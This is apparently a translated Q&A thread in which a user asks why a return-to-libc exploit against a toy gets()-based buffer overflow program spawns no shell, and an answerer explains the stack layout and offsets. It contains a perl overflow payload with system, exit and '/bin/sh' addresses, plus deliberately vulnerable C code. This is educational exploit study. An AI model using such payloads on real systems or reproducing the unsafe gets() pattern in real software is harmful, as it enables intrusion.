8

return-to-libc エクスプロイトに問題があります。問題は、何も起こらないことですが、セグメンテーション違反はありません (そして、実際にスタックがオーバーフローしています)。

これは私のプログラムです:

int main(int argc, char **argv) {
  char array[512];
  gets(array);
}

私のアドレスは0x00で始まり、strcpyはそれが文字列の終わりであると考えているため、strcopyの代わりにgetsを使用しているため、使用できません。

必要なアドレスは次のとおりです。

$ gdb main core
(gdb) p system
$1 = {<text variable, no debug info>} 0x179680 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x16f6e0 <exit>
(gdb)  x/s 0xbffffe3f
0xbffffe3f:      "/bin/sh"

正しいシーケンスを入力すると、次のことが起こります。

eleanor@eleanor32:~/testing/root$ perl -e 'print "\x41"x516 . "\x80\x96\x17\x00" . "\xe0\xf6\x16\x00" . "\x3f\xfe\xff\xbf"' | ./main
eleanor@eleanor32:~/testing/root$

だから何もない。

しかし、520 'A' (0x41) を入力すると、EIP が 'A' でオーバーフローします。516 'A' がある場合、何も起こりませんが、EIP には、/bin/sh ポインターに続く終了アドレスに続くシステム アドレスが含まれます。

なぜ何も起こらなかったのですか?

4

1 に答える 1

3

前にいくつかのasmを実行しましょう:

コード

$ cat gets.c
int main(int argc, char **argv) {
  char array[512];
  gets(array);
}

Asm

$ gcc gets.c -o getsA.s -S -fverbose-asm
$ cat gets.s
    ....
.globl main
        .type   main, @function
main:
        leal    4(%esp), %ecx   #,
        andl    $-16, %esp      #,
        pushl   -4(%ecx)        #  (1)
        pushl   %ebp            #  2
        movl    %esp, %ebp      #,
        pushl   %ecx            #  3
        subl    $516, %esp      #,
        leal    -516(%ebp), %eax        #, tmp60
        movl    %eax, (%esp)    # tmp60,
        call    gets            #  << break here  
        addl    $516, %esp      #,  << or here to see the stack picture
        popl    %ecx            #  (3')
        popl    %ebp            #  (2')
        leal    -4(%ecx), %esp  #  (1')
        ret
        .size   main, .-main

プロローグとエピローグ(これらはアライメントコード付き)については、ここで詳しく説明します。いくつかのアセンブリステートメントの目的を理解する

スタックレイアウト:

(char)  array[0]
...
(char)  array[511]
(32bit) $ecx - pushed by 3 - it was the address on the stack of the eip which main will return to
(32bit) $ebp - pushed by 2
(32bit) $esp - pushed by 1 - change the $esp to the original value

したがって、mainの差出人アドレスを変更する場合は、によって使用されるスタック内のアドレスを変更するのではなくret、(1)、(2)、(3)プッシュによってスタックに保存された値を繰り返す必要があります。または、配列自体に新しい差出人アドレスを埋め込み、新しいスタックアドレス+4で(3)のみを上書きすることもできます。(516バイトの文字列を使用)

このソースコードを使用してハッキングすることをお勧めします。

$ cat getss.c
f()
{
  char array[512];
  gets(array);
}
int main(int argc, char **argv) {
    f();
}

fはスタックの再調整に問題がないため

.globl f
        .type   f, @function
f:
        pushl   %ebp    #
        movl    %esp, %ebp      #,
        subl    $520, %esp      #,
        leal    -512(%ebp), %eax        #, tmp59
        movl    %eax, (%esp)    # tmp59,
        call    gets    #
        leave
        ret
        .size   f, .-f

スタックレイアウトf()

(char)  array[0]
...
(char)  array[511]
(32bit) old ebp
(32bit) return address

520バイトの「A」を含むf()のret命令でのブレークポイント

(gdb) x/w $sp
0xXXXXXa3c:     0x41414141
于 2011-02-18T19:31:42.840 に答える